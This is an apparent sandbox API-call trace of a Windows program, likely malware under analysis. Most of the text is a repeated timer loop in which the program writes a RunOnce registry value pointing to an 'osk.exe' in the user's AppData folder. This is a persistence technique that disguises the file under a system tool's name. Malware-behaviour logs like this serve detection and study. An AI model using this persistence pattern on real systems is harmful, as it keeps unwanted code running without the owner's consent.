[0093.059] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.059] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.060] KillTimer (hWnd=0x20280, uIDEvent=0x2224) returned 1 [0093.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.060] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.060] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.061] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.061] RegCloseKey (hKey=0x280) returned 0x0 [0093.061] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.061] SetTimer (hWnd=0x20280, nIDEvent=0x2225, uElapse=0xa, lpTimerFunc=0x0) returned 0x2225 [0093.061] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.075] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.075] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.075] KillTimer (hWnd=0x20280, uIDEvent=0x2225) returned 1 [0093.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.076] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.076] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.076] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.076] RegCloseKey (hKey=0x280) returned 0x0 [0093.077] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.077] SetTimer (hWnd=0x20280, nIDEvent=0x2226, uElapse=0xa, lpTimerFunc=0x0) returned 0x2226 [0093.077] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.091] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.091] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.091] KillTimer (hWnd=0x20280, uIDEvent=0x2226) returned 1 [0093.091] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.092] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.092] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.092] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.092] RegCloseKey (hKey=0x280) returned 0x0 [0093.092] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.092] SetTimer (hWnd=0x20280, nIDEvent=0x2227, uElapse=0xa, lpTimerFunc=0x0) returned 0x2227 [0093.092] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.106] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.106] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.106] KillTimer (hWnd=0x20280, uIDEvent=0x2227) returned 1 [0093.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.107] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.107] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.107] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.107] RegCloseKey (hKey=0x280) returned 0x0 [0093.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.108] SetTimer (hWnd=0x20280, nIDEvent=0x2228, uElapse=0xa, lpTimerFunc=0x0) returned 0x2228 [0093.108] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.122] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.122] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.122] KillTimer (hWnd=0x20280, uIDEvent=0x2228) returned 1 [0093.122] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.123] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.123] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.123] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.123] RegCloseKey (hKey=0x280) returned 0x0 [0093.123] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.123] SetTimer (hWnd=0x20280, nIDEvent=0x2229, uElapse=0xa, lpTimerFunc=0x0) returned 0x2229 [0093.123] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.254] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.254] KillTimer (hWnd=0x20280, uIDEvent=0x2229) returned 1 [0093.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.254] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.255] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.255] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.255] RegCloseKey (hKey=0x280) returned 0x0 [0093.255] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.255] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.255] SetTimer (hWnd=0x20280, nIDEvent=0x222a, uElapse=0xa, lpTimerFunc=0x0) returned 0x222a [0093.255] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.262] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.263] KillTimer (hWnd=0x20280, uIDEvent=0x222a) returned 1 [0093.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.264] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.264] RegCloseKey (hKey=0x280) returned 0x0 [0093.264] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.264] SetTimer (hWnd=0x20280, nIDEvent=0x222b, uElapse=0xa, lpTimerFunc=0x0) returned 0x222b [0093.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.278] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.278] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.278] KillTimer (hWnd=0x20280, uIDEvent=0x222b) returned 1 [0093.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.279] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.279] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.279] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.279] RegCloseKey (hKey=0x280) returned 0x0 [0093.279] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.280] SetTimer (hWnd=0x20280, nIDEvent=0x222c, uElapse=0xa, lpTimerFunc=0x0) returned 0x222c [0093.280] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.294] KillTimer (hWnd=0x20280, uIDEvent=0x222c) returned 1 [0093.294] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.294] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.294] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.294] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.295] RegCloseKey (hKey=0x280) returned 0x0 [0093.295] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.295] SetTimer (hWnd=0x20280, nIDEvent=0x222d, uElapse=0xa, lpTimerFunc=0x0) returned 0x222d [0093.295] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.309] KillTimer (hWnd=0x20280, uIDEvent=0x222d) returned 1 [0093.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.310] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.310] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.310] RegCloseKey (hKey=0x280) returned 0x0 [0093.311] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.311] SetTimer (hWnd=0x20280, nIDEvent=0x222e, uElapse=0xa, lpTimerFunc=0x0) returned 0x222e [0093.311] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.325] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.325] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.325] KillTimer (hWnd=0x20280, uIDEvent=0x222e) returned 1 [0093.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.326] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.326] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.326] RegCloseKey (hKey=0x280) returned 0x0 [0093.326] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.326] SetTimer (hWnd=0x20280, nIDEvent=0x222f, uElapse=0xa, lpTimerFunc=0x0) returned 0x222f [0093.326] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.340] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.340] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.341] KillTimer (hWnd=0x20280, uIDEvent=0x222f) returned 1 [0093.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.341] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.342] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.342] RegCloseKey (hKey=0x280) returned 0x0 [0093.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.342] SetTimer (hWnd=0x20280, nIDEvent=0x2230, uElapse=0xa, lpTimerFunc=0x0) returned 0x2230 [0093.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.358] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.358] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.359] KillTimer (hWnd=0x20280, uIDEvent=0x2230) returned 1 [0093.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.359] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.359] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.360] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.360] RegCloseKey (hKey=0x280) returned 0x0 [0093.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.360] SetTimer (hWnd=0x20280, nIDEvent=0x2231, uElapse=0xa, lpTimerFunc=0x0) returned 0x2231 [0093.360] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.372] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.372] KillTimer (hWnd=0x20280, uIDEvent=0x2231) returned 1 [0093.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.373] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.373] RegCloseKey (hKey=0x280) returned 0x0 [0093.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.373] SetTimer (hWnd=0x20280, nIDEvent=0x2232, uElapse=0xa, lpTimerFunc=0x0) returned 0x2232 [0093.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.387] KillTimer (hWnd=0x20280, uIDEvent=0x2232) returned 1 [0093.387] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.388] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.388] RegCloseKey (hKey=0x280) returned 0x0 [0093.388] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.389] SetTimer (hWnd=0x20280, nIDEvent=0x2233, uElapse=0xa, lpTimerFunc=0x0) returned 0x2233 [0093.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.403] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.403] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.403] KillTimer (hWnd=0x20280, uIDEvent=0x2233) returned 1 [0093.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.404] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.404] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.404] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.405] RegCloseKey (hKey=0x280) returned 0x0 [0093.405] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.405] SetTimer (hWnd=0x20280, nIDEvent=0x2234, uElapse=0xa, lpTimerFunc=0x0) returned 0x2234 [0093.405] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.419] KillTimer (hWnd=0x20280, uIDEvent=0x2234) returned 1 [0093.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.420] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.420] RegCloseKey (hKey=0x280) returned 0x0 [0093.420] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.420] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.420] SetTimer (hWnd=0x20280, nIDEvent=0x2235, uElapse=0xa, lpTimerFunc=0x0) returned 0x2235 [0093.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.435] KillTimer (hWnd=0x20280, uIDEvent=0x2235) returned 1 [0093.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.436] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.436] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.436] RegCloseKey (hKey=0x280) returned 0x0 [0093.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.436] SetTimer (hWnd=0x20280, nIDEvent=0x2236, uElapse=0xa, lpTimerFunc=0x0) returned 0x2236 [0093.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.449] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.449] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.450] KillTimer (hWnd=0x20280, uIDEvent=0x2236) returned 1 [0093.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.450] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.450] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.451] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 